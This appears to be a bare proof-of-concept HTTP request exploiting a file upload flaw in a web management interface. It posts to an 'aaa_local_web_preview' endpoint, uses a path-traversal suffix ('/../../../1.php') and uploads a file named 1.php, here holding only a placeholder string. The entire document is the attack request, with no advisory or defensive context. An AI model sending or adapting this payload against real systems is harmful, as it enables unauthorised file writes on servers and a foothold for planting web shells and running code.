POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../1.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=849978f98abe41119122148e4aa65b1a
Accept-Encoding: gzip
Content-Length: 200

--849978f98abe41119122148e4aa65b1a
Content-Disposition: form-data; name="123"; filename="1.php"
Content-Type: text/plain

123456789
--849978f98abe41119122148e4aa65b1a--